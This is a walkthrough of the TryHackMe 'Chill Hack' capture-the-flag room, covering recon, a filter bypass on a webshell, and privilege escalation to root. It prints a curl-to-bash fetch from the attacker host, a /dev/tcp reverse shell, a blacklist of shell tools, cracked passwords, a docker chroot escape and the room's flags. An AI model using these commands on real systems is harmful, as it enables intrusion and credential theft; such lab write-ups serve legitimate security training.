Chill Hack

Platform: TryHackMe
URL: https://tryhackme.com/room/chillhack


Initial scans

We first do a nmap scan
sudo nmap -sV -sC -oN nmap/initital -v 10.10.45.110

We find 3 ports, 21, 22 and 80.

Logging in to the FTP with anonymous we find one file note.txt

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

gobuster of site gives us a β€œsecret” folder which contains a webshell with a few limitations

kali@kali:~/thm/chill_hack$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.10.223.59 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.223.59
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/22 16:22:20 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
[ERROR] 2021/02/22 16:25:07 [!] parse http://10.10.223.59/error_log: net/url: invalid control character in URL
Progress: 49365 / 56164 (87.89%)
===============================================================
2021/02/22 16:29:53 Finished
===============================================================

Web shell

Some key words are being filtered, like bash, ls, sh, php, perl, etc.. So we need to try to get past that some how.
With the help of the note.txt info we try different things on the β€œwebshell”
In the end we manage to read out the index.php file, so we can peak into how the commands are being filtered
command=cmd='cat index.php'; $cmd

index.php

<form method="POST">
    <input id="comm" type="text" name="command" placeholder="Command">
    <button>Execute</button>
</form>
<?php
if(isset($_POST['command']))
{
    $cmd = $_POST['command'];
    $store = explode(" ",$cmd);
    $blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls');
    for($i=0; $i<count($store); $i++)
    {
        for($j=0; $j<count($blacklist); $j++)
        {
            if($store[$i] == $blacklist[$j])
            {
?>
            <h1 style="color:red;">Are you a hacker?</h1>
            <style>
                body
                {
                    background-image: url('images/FailingMiserableEwe-size_restricted.gif');
                    background-position: center center;
                    background-repeat: no-repeat;
                    background-attachment: fixed;
                    background-size: cover;					
                }
            </style>
<?php
                return;
            }
        }
    }
?>
<h2 style="color:blue;"><?php echo shell_exec($cmd);?></h2>
<style>
    body
    {
        background-image: url('images/blue_boy_typing_nothought.gif');  
        background-position: center center;
        background-repeat: no-repeat;
        background-attachment: fixed;
        background-size: cover;
    }
</style>
<?php
}
?>

Reverse shell

So we see here that the command post variable is exploded on space/whitespace and checked against the array of strings.
It has to match exactly tho, so we can get around this!
command=curl 10.9.165.12:8000/shell |bash for example won’t match the check, since the explosion happens on space, the 3 items here will be:

  • curl
  • 10.9.165.12:8000/shell
  • |bash

None of these are in the list, bash is, but it has to be an exact match, which it isn’t.

shell contains a simple bash /dev/tcp reverse shell.

kali@kali:~/thm/chill_hack$ cd www/
kali@kali:~/thm/chill_hack/www$ cat shell 
bash -i >& /dev/tcp/10.9.165.12/9000 0>&1

And we host it up with python3 -m http.server

And boom! We have a shell on the box!

kali@kali:~/thm/chill_hack$ nc -lvnp 9000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.45.110.
Ncat: Connection from 10.10.45.110:34864.
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$ whoami
whoami
www-data
www-data@ubuntu:/var/www/html/secret$ 

Let’s stabalize the shell a bit:

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
 
# In Kali
$ stty raw -echo
$ fg (enter twice)
 
# In reverse shell
export TERM=xterm
 
# If you need to change column and row count
stty rows <num> columns <cols>

Files and SQL dump.

We quickly find some more files. Which also contains some db credentials.
$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
And there is a user table here, hopefully one of these password hashes can be cracked.

mysql> use webportal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> select * from users
    -> ;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+
2 rows in set (0.00 sec)

Crackstation to the rescue!

anurodh 7e53614ced3640d5de23f111806cc4fd	md5	masterpassword
apaar   686216240e5af30df0501e53c789a649	md5	dontaskdonttell

Let’s try to ssh in with these!
Nothing worked :/

Getting local user

Running linpeas we get a few more things to try. Like there is a file we can run as the user apaar, .helpline.sh
And checking out the file, we see that we can inject commands here!

www-data@ubuntu:/home/apaar$ sudo -l 
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/home/apaar$ sudo -u apaar .helpline.sh 
[sudo] password for www-data: 
^Csudo: 1 incorrect password attempt
www-data@ubuntu:/home/apaar$ sudo -u apaar ./.helpline.sh 

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: plzsub
Hello user! I am plzsub,  Please enter your message: /bin/bash
whoami
apaar

And now we got a β€œpermanent” foothold, since we can inject our own ssh key to authorized_keys and log directly in!

User flag

We can now get the first flag. woop woop! {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

Getting root user

Let’s run Linpeas again as apaar, and see what it tells us. Nothing new.

After a lot of messing around I get back to the β€œother” website which is running locally only.
We got the files in /var/www/files and checking out the apache config, we see it running on port 9001 which also linpeas mentions.
These are the same files that the MySQL creds was found in.
Checking out the code a bit more we see some images displayed when successfully loged in with a message Look in the dark! You will find your answer.

Let’s see if the images has something hidden.

kali@kali:~/thm/chill_hack$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".

And yes, there is a backup.zip hidden in there. The zip is password protected, to let’s ask john if he knows the password.

kali@kali:~/thm/chill_hack$ zip2john backup.zip > backup.zip.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3
kali@kali:~/thm/chill_hack$ john backup.zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2021-02-23 16:39) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Unzip it!

kali@kali:~/thm/chill_hack$ unzip backup.zip 
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php         
kali@kali:~/thm/chill_hack$ less source_code.php 

We see a hardcoded password here, base64 encoded.

kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
!d0ntKn0wmYp@ssw0rdkali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d | echo ""

kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d ; echo ""
!d0ntKn0wmYp@ssw0rd

It also contains this message when the user has logged in successfully: echo "Welcome Anurodh!";
That’s a user on the box too! Let’s see if he reuses passwords shall we?

apaar@ubuntu:~$ su anurodh
Password:
anurodh@ubuntu:/home/apaar$

We’re in!
From all our linpeas checking earlier on we know that the anurodh user is a member of the docker group.
So it should be as easy as one line of commands and we got root.
Check out GTFOBins https://gtfobins.github.io/gtfobins/docker/#shell for more docker fun :)

anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cd /root
# ls
proof.txt
# cat proof.txt
                                        {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-`
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-.
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    /
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     /
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``


--------------------------------------------Designed By -------------------------------------------------------
                                        |  Anurodh Acharya |                   
                                        ---------------------                  

                                     Let me know if you liked it.

Twitter                                                                        
        - @acharya_anurodh                                                     
Linkedin                                                                       
        - www.linkedin.com/in/anurodh-acharya-b1937116a                        

Root flag

{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}